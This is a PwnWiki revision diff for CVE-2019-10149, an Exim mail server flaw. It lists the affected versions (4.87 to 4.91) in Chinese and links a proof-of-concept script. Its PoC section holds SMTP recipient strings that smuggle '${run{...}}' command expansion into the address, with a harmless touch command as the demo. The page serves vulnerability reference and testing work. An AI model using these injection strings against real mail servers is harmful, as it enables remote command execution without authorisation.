Difference between revisions of "CVE-2019-10149 Exim郵箱服務漏洞"

From PwnWiki
(Created page with "<languages /> ==POC== <pre> 'RCPT TO "${run{...}}@relaydomain.com"' </pre> <pre> noob+${run{/usr/bin/touch /tmp/hello}}@myserver.com </pre>")
 
(增加一些信息 并且 加入 poc 的引用)
Line 1: Line 1:
 
<languages  />
 
<languages  />
 +
 +
== '''影响范围''' ==
 +
Exim 版本 4.87 至 4.91
 +
 
==POC==
 
==POC==
 
<pre>
 
<pre>
Line 9: Line 13:
 
  noob+${run{/usr/bin/touch /tmp/hello}}@myserver.com
 
  noob+${run{/usr/bin/touch /tmp/hello}}@myserver.com
 
</pre>
 
</pre>
 +
 +
== '''引用''' ==
 +
https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py

Revision as of 21:32, 20 March 2021


影响范围

Exim 版本 4.87 至 4.91

POC

 'RCPT TO "${run{...}}@relaydomain.com"'


 noob+${run{/usr/bin/touch /tmp/hello}}@myserver.com